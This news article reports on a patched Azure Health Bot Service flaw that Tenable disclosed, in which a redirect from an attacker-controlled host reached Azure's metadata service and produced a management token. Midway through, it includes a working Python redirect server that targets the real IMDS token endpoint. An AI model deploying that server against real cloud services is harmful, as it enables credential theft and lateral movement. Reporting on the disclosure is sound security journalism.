Microsoft’s AI healthcare bots might have some worrying security flaws
Researchers were able to bypass certain protections in Azure Health Bot Service
Microsoft’s AI-powered bots for the healthcare industry have been found to be vulnerable in a way that could have allowed threat actors to move across the target IT infrastructure and even steal sensitive information.
Cybersecurity researchers at Tenable, who discovered the flaws and reported them to Microsoft, outlined how the flaws in Azure Health Bot Service enabled lateral movement throughout the network, and thus access to sensitive patient data.
The Azure AI Health Bot Service is a tool enabling developers to build and deploy virtual health assistants, powered by artificial intelligence (AI). That way, healthcare orgs can cut down on cost and improve efficiency, without compromising on compliance.
Data Connections
Generally speaking, digital assistants also work with plenty of sensitive information, which makes security and data integrity paramount.
Tenable sought to analyze how the chatbot handles the workload, and found a few issues in a feature called “Data Connections”, designed to pull data from other services. The researchers pointed out that the tool does have built-in safeguards that block unauthorized access to internal APIs, but they managed to bypass them by issuing redirect responses while reconfiguring a data connection through a controlled external host.
They set up the host to respond to requests with a 301 redirect aimed at Azure’s Instance Metadata Service (IMDS). That gave them access to a valid metadata response which, in turn, gave them an access token for management.azure.com. With the token, they were able to list all the subscriptions it granted access to.
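The redirect trick described above can be sketched in a few lines. The following is a minimal, hypothetical illustration (the listener address and port are assumptions, not details from Tenable's report): an attacker-controlled web server that answers every request with an HTTP 301 pointing at the real Azure IMDS token endpoint, so that any backend which follows redirects ends up querying IMDS on the attacker's behalf.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Azure's real IMDS token endpoint; the query string requests a token
# scoped to the Azure Resource Manager API (management.azure.com).
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class RedirectToIMDS(BaseHTTPRequestHandler):
    """Respond to every GET with a 301 pointing at the IMDS endpoint."""

    def do_GET(self):
        self.send_response(301)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

    def log_message(self, *args):
        # Keep the sketch quiet; a real attacker host might log requests.
        pass

def start_redirect_host(port=0):
    """Start the attacker-controlled host on a background thread.

    port=0 picks an ephemeral port; the configured data connection
    would be pointed at this address.
    """
    server = HTTPServer(("127.0.0.1", port), RedirectToIMDS)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

The point of the sketch is that the safeguard only vetted the host the data connection was configured with, not where a redirect sent the request afterwards, which is why a plain 301 was enough to reach an internal-only service.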
A few months ago, Tenable reported its findings to Microsoft, and soon after, all regions were patched. There is no evidence the flaw was exploited in the wild, it added.
“The vulnerabilities discussed … involve flaws in the underlying architecture of the AI chatbot service rather than the AI models themselves,” the researchers noted, adding that this “highlights the continued importance of traditional web application and cloud security mechanisms in this new age of AI powered services.”
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.